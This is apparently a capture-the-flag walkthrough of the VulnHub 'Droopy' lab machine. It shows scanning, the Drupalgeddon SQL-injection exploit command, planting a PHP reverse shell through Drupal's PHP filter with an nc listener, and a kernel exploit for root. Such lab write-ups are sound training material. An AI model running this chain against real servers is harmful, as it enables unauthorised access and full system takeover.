Yet again today we be working on another OSCP like box Droopy On vulnhub you can grab a copy here Download Droopy: v0.2
We always start with an nmap scanβ¦..
Nmap -sC -sV -oA nmap <Target-IP>
βββ(muzecγΏMuzec-Security)-[~/Documents/Vulnhubs/droppy]
ββ$ nmap -sC -sV -oA nmap 172.16.139.175
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 10:01 EDT
Nmap scan report for 172.16.139.175
Host is up (0.00013s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds
Just a single port cool and a robots.txt directory cool let check the webpage to see what is running .
The CMS is drupal let check the robots.txt .
So i decided to check the /CHANGELOG.txt directory since it always hold drupal version let confirm it .
And we have the version let do a quick searchsploit on it .
βββ(muzecγΏMuzec-Security)-[~/Documents/Vulnhubs/droppy] ββ$ searchsploit Drupal 7.30 ββββββββββββββββββββββββββββββββββββββββββββ- βββββββββββ Exploit Title | Path ββββββββββββββββββββββββββββββββββββββββββββ- βββββββββββ Drupal 7.0 < 7.31 - βDrupalgeddonβ SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - βDrupalgeddonβ SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - βDrupalgeddonβ SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - βDrupalgeddonβ SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - βDrupalgeddonβ SQL Injection (Remote Code Execution) | php/webapps/35150.php Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - βDrupalgeddon3β (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - βDrupalgeddon3β (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - βDrupalgeddon2β Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - βDrupalgeddon2β Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - βDrupalgeddon2β Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py ββββββββββββββββββββββββββββββββββββββββββββ- βββββββββββ Shellcodes: No Results
And boom we some exploit let try the first one since it will be adding a new admin user sound cool right .
python 34992.py -t http://172.16.139.175/ -u muzec -p muzec
And user created let use it to log in .
Ahhhhh we are in awesome right?? lol now let try and get a reverse shell let do some setting first.
Click on Modules and scroll down and tick PHP filter and click on save .
Now let go back to the same Modules and click on permission close to the PHP filter .
Now let scroll down and tick Use the PHP code text format and save permission.
Now let click on Add content .
Click on article .
Now at title let name it shell and skip the tag and move to the body now we need a reverse shell code from pentestmonkey the php one which you can download it here Download PHP Reverse Shell .
Now let copy the reverse shell code to the body and make sure we add our Local-IP address and port also let start an Ncat listener.
Now at text format let pick PHP code .
Now let click on save going back to our listener we should have shell.
And boom we have shell .
Now let spawn a TTY shell .
βββ(muzecγΏMuzec-Security)-[~/Documents/Vulnhubs/droppy]
ββ$ nc -nvlp 5555
listening on [any] 5555 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.4] 55347
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
18:37:44 up 40 min, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn ("/bin/bash")'
www-data@droopy:/$
Checking the home directory found a user but nothing interesting about it .
www-data@droopy:/home/gsuser$ ls
ls
drupal
www-data@droopy:/home/gsuser$ ls -la
ls -la
total 32
drwxr-xr-x 4 gsuser gsuser 4096 Apr 10 2016 .
drwxr-xr-x 3 root root 4096 Dec 11 2014 ..
-rw-r--r-- 1 gsuser gsuser 220 Dec 11 2014 .bash_logout
-rw-r--r-- 1 gsuser gsuser 3637 Dec 11 2014 .bashrc
drwx------ 2 gsuser gsuser 4096 Dec 11 2014 .cache
-rw-r--r-- 1 gsuser gsuser 675 Dec 11 2014 .profile
-rw------- 1 root root 1463 Dec 11 2014 .viminfo
drwxrwxr-x 2 gsuser gsuser 4096 Apr 11 2016 drupal
www-data@droopy:/home/gsuser$
Privilege Escalation
Going around found a credentials for MYSQL but nothing intesting in the databases so i decided to check for version .
uname -a
A quick google search and we found our exploit not sure but let give it a try .
Now let transfer it to the target with SimpleHTTPServer and wget .
Now let compile the exploit.
gcc 37292.c -o exploit now let run it .
Boom we are root .
Greeting From Muzec